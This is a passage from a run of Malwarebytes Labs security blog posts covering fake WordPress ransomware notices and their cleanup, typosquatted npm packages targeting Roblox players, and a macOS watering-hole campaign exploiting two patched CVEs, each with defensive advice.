WordPress

WordPress is one of the, if not the most popular content management system (CMS). Of course, this also makes it a primary target for anyone looking to compromise websites. WordPress is an open-source CMS, meaning its source code is public so that anyone can inspect, modify, and enhance. This has resulted in a great many available plugins to add to sites that perform all kinds of tasks, from stopping spammers to incorporating special smileys. You name it, there is a plugin for it.

Unfortunately, not all these plugins have the same level of security, and some even have an ulterior, malicious motive. In this case, it looks as if files were added into the directory of an already present plugin.

Removing the infection

Once the infection was found, it turned out to be easy to remove. All victims had to do is find the file with the bitcoin address in it and delete it. In this case it was the file /wp-content/plugins/directorist/directorist-base.php. Directorist is the name of a legitimate plugin intended to create lists of directories based on location, category, and other interests.

By backtracking changes and looking at the access logs, the researchers found that it is very likely the legitimate plugin was already installed on the website and later tampered with by the attackers. While it was clear that the attacker must have had administrator level access, it is unclear whether they had brute forced the admin password or had acquired the already-compromised login from the black market.

Restoring the website

Deleting the file removed the ransom notice but it also left the researchers with a lot of 404 Not Found responses to internal links on the website. As it turned out, our fake ransomware included a basic SQL command which finds any posts and pages with the “publish” status and changes them to “null“. All the content was still in the database, just unable to be viewed!

Website administrators can undo this effect by using another simple SQL command.

UPDATE `wp_posts` SET `post_status` = 'publish' WHERE `post_status` = 'null';

Please note that this command will also bring back some content that you may have removed yourself, but at least it will bring back all the content that the plugin made invisible.

Under development?

The researchers found indications for the presence of a file called azz_encrypt.php in the directorist directory, but were unable to find the file actually present on any of the infected websites they looked at. So this CMS hijack may be a work in progress that aims to do some actual encryption at one point.

How to protect your WordPress site

If you are running a website, you do not need scares like this one. Besides a possible loss of revenue, it brings in extra work. So what can you do to keep your WordPress site safe?

  • When using a CMS, and especially a popular one, you need to keep an eye out for updates—for both the CMS itself and any plugins you have installed. Speed is important, so patch as soon as you are able. Attackers are always aware of the latest vulnerabilities and will scan the Internet for unpatched sites to hijack, sometimes within hours of a patch being made available.
  • Create backups regularly (there are plugins for that). If you find out an intruder made changes to your website, it makes things a lot easier for you if you have a recent backup that you can restore without losing too much work, and without having to comb through every piece of code to check if anything else has been tampered with.
  • Choose your plug-ins wisely.
  • Think about access management. Consider who you allow to make changes to your site, and to what level.
  • Use secure passwords (and preferably 2FA) .
  • Be wary of SQL injection.
  • If you allow uploads, limit the type of files to non-executables and monitor them closely.
  • For websites that require even more security, there are specialized vulnerability scanners and application firewalls that you may want to look into. This is especially true if you are a popular target for people that would love to deface or abuse your website.
  • If the CMS is hosted on your own servers, be aware of the dangers that this setup brings. Remember that you are relying on open-source code. Running it on your own servers should be met with special precautions to keep it separated from other work servers.

Stay safe, everyone!

The post Fake ransomware warnings hit WordPress sites: How to stay safe appeared first on Malwarebytes Labs.

Bogus JS libraries become sustained ransomware threat for Roblox gamers

If your kids play Roblox, you may wish to warn them of ransomware perils snapping at their heels. A very smart, and determined attack has been taking place for a little while now. Although initially dismissed as a form of prank, the developers under fire now disagree. Whether prank or malicious campaign, the end results are still bad for everyone involved. Shall we take a look?

What is Roblox?

If you have younger kids and they play games, they may well have dabbled in Roblox. If so, you’ll have experienced howls of outrage for a few days in October when the entire system came crashing down.

It’s a game, but also much more than that. It’s a place where other users can make their own games inside the Roblox landscape. It’s been around since 2006, and has millions of users. Kids love it because every time they log in, there’ll be something different to do. If they start making content, there’s even the possibility of making money from it.

As you can imagine, this makes it a popular target for scammers and malware authors. As they’re primarily targeting kids, it’s probably a bit easier to go on the offensive than tackling more cautious adults.

What tactics are used to scam Roblox users?

Glad you asked! We covered one such scam last year. Robux is the in-game currency used by players. It can be bought with real money, or earned via creating content (assuming the child is over 13 years of age).

As a result, Robux cash generators are rife and will send gamers off to bogus surveys, malware installs, phish attempts…the usual collection of awfulness.

Outside of Robux generators, phishing and malware generally are popular with scammers everywhere. You can read about typical Roblox experiences here. Not everything is scam central; some of it is just weird, or baffling. Even so, it pays to be on your guard. This is especially applicable in this case. We don’t “just” have scammers targeting the kids directly. What we have here is people trying to place bogus files in locations the players wouldn’t necessarily expect to find them.

We now turn our attention to Noblox, the stepping-stone for scammers to reach their goal of the end users.

Roblox and Noblox

Noblox is a popular way to automate certain in-game Roblox functions. As per its description:

This NPM package enables operations froms the Roblox website to be executed via NodeJS; many individuals leverage noblox.js along side Roblox’s HTTPService to create in-game scripts that interact with the website, i.e. promote users, shout events, and so on, or to create Discord utiltiies to manage their community.

Malicious packages containing ransomware were found to be emulating the real thing.

Noblox.js-proxy imitated noblox.js, deliberately using a name as similar as possible. Meanwhile, Noblox.js-proxies did the same thing to the legitimate noblox.js-proxied. The bad packages had a few hundred downloads between them before being shut down.

The scammers reused certain portions of the real thing, and then dropped dubious code into places users wouldn’t suspect. A little bit of obfuscated code later, and the end result is Trojans dropped onto the target PC, alterations to the Windows registry, and a dash of ransomware to round the whole sorry enterprise off.

When “pranks” start to get serious

This one was arguably well beyond the prank point and had at least one foot in serious territory. A feeling now compounded as the Noblox devs flag at least 6 different libraries aiming to confuse and trap unsuspecting victims.

Although the bogus libraries are being taken offline, the people behind this are making use of Discord to cause additional headaches. Multiple servers exist and are being used to trick younger users into downloading the rogue files. Regular readers will be familiar with the type of Discord messages used for these sorts of antics.

What can Roblox gamers do to avoid these attacks?

As many of the bogus files are being sent in Discord, gamers should be very cautious around anything sent their way. These rogue messages may be sent via DM or posted publicly in a Discord server. They could also arrive via other methods. It’s a tricky one to address, because we’re dealing with younger users who may not be massively tech savvy, versus a confusing selection of package repositories and somewhat technical file names.

If you’re a parent and unsure about your kid’s activity in Roblox, and want to know more about it generally, a good place to start is the Roblox Parents’ Guide. If your kids are making their own games and want to branch out into the kind of package assistance seen above, it may be worth reading the FAQs from the developers. This isn’t a problem that’s likely to go away overnight, and that’s what the scammers and malware authors are banking on.

The post Bogus JS libraries become sustained ransomware threat for Roblox gamers appeared first on Malwarebytes Labs.

New Mac malware raises more questions about Apple’s security patching

Apple’s reputation on security has been taking a beating lately. As mentioned in some of our previous coverage, security researcher Joshua Long recently shone a light on problems with Apple’s security patching strategy. His findings showed a shocking number of cases where Apple patched a vulnerability, but did not do so in all of the vulnerable system versions. Often, systems older than the most current one were left in vulnerable states.

In theory, this could lead to attacks on those vulnerable systems. And new Mac malware that was disclosed on Thursday provides a concrete example of why this is not just theory.

Watering hole campaign discovered by Google

Google’s Threat Analysis Group (TAG) discovered a watering hole campaign in Hong Kong, targeting journalists and pro-democracy political groups. This campaign was using two macOS vulnerabilities to infect Macs that simply visited the wrong web page.

A watering hole attack is one that’s deployed through a website that the desired target is likely to visit, so named because of the way predators will hide near a watering hole that is frequented by their prey.

The vulnerabilities were used to drop malware onto the computer silently, without the user needing to click on anything or even being aware that anything has happened. The malware itself is a pretty full-featured backdoor, but what is most remarkable about it is not its capabilities. This malware has been in the wild, with very few changes, since at least 2019. Back then, it was distributed as a trojan, in an installer disguised as – you’ll never guess – an Adobe Flash Player installer!

Fake Adobe Flash Player window with the messages "Prompt" and "Installation is successful" in Chinese, and a button labeled "Confirm" in Chinese.
Fake Adobe Flash Player installer used to install the malware

Some of the executable files dropped by this installer from 2019 are nearly the same as the ones currently in distribution, but were (as of Thursday) still undetected by any antivirus software.

The vulnerabilities had been fixed… sort of

The first vulnerability used by the malware was CVE-2021-1789, which was a remote code execution (RCE) vulnerability in WebKit. This means that it allowed an attacker to trick WebKit – the foundation of Safari and a number of other browsers – into executing arbitrary code, which is not supposed to be possible.

The second vulnerability, CVE-2021-30869, was a privilege escalation bug. This means that it could be used to run arbitrary code with the highest level of permissions possible when it should not actually have that level of access.

The first of these was patched on February 1, with the release of macOS Big Sur 11.2 and Safari 14.0.3. The latter would have fixed the problem on macOS Catalina (10.15) and macOS Mojave (10.14), if users had upgraded to Safari 14.

The second was apparently also fixed in Big Sur 11.2, on February 1, although it was not originally mentioned in the release notes. Mention of the fix was added on September 23, after Google alerted Apple to the issue and on the same day Apple released Security Update 2021-006 Catalina, to fix the issue in macOS Catalina.

Entry for CVE-2021-30869 added on September 23, 2012

Catalina wasn’t fixed for more than seven months?!

Yes, you heard that right. Apple knew about the vulnerability long before, and fixed it in macOS Big Sur, after the team who found it, Pangu, alerted Apple of the issue. Pangu went on to present their findings in April at the Zer0con security conference.

However, the same bug apparently existed in Catalina, which remained unpatched seven months after Apple released the patch for Big Sur, and more than five months after the details had been released at Zer0con. This allowed attackers to target individuals running Catalina and Safari 13 without detection. (According to TAG, more than 200 machines may have been targeted for infection at the time it discovered the campaign.)

There’s a lot that’s unclear about why this might have happened. Did Apple know that the bug affected Catalina, but chose not to patch it? Was the bug superficially different in Catalina, and thus was missed in a cursory investigation? Or was the bug completely different, but resulted in the same vulnerability? Only Apple could say.

I do find it highly suspicious that mention of this fix was left off of the Big Sur 11.2 release notes, and then added at the end at the same time the bug was fixed in Catalina. That would seem to suggest that it’s something that Apple already knew should have been fixed, or very quickly identified as being the same as the Big Sur bug.

Takeaways

There are a couple things that this incident illustrates quite plainly. First, this throws further weight behind what Joshua Long has taught us; that Apple can only be relied on to patch the absolute latest version of macOS, which is currently macOS Monterey (12). If you are using an older system, you do so at your own risk.

I personally have an older machine still on macOS Mojave, because upgrading to anything newer means I’d lose access to all my old 32-bit Steam games. However, since I’m aware that that system can no longer be considered secure, I limit what I do with it. Any web browsing and other online activities are done with my up-to-date devices, and since I’ve recently migrated to a newer machine, I’ll soon remove my personal data from the Mojave machine.

Second, the fact that this malware went undetected since at least 2019 is, unfortunately, a repeating pattern. There has been a lot of very tightly targeted nation state malware affecting Mac users, and because of the very limited number of victims, it’s hard to detect. Those managing business environments would do well to use some kind of EDR or other monitoring software, but what is an average person to do with their personal Macs?

Some steps you can take to avoid this kind of malware would include:

  • Keeping your system and all your software fully up to date
  • Be conscious of everything you open on your computer, and be sure you know exactly what it is before you do so
  • Never install Adobe Flash Player, whether you think it’s legitimate or not!
  • Use an ad blocker (malicious ads can be a source of malware) and some kind of protection against malicious sites, such as the free Malwarebytes Browser Guard
  • If you engage in any “risky” activities, consider doing them from a burner device with no access to your data, such as a cheap Chromebook
  • If you are a potential target of a hostile nation-state – such as a journalist or human rights activists critical of an oppressive regime, or a member of a group persecuted by a government (such as the Uyghur people in China) – consider consulting with a security professional

Malwarebytes for Mac detects this malware as OSX.CDDS.

The post New Mac malware raises more questions about Apple’s security patching appeared first on Malwarebytes Labs.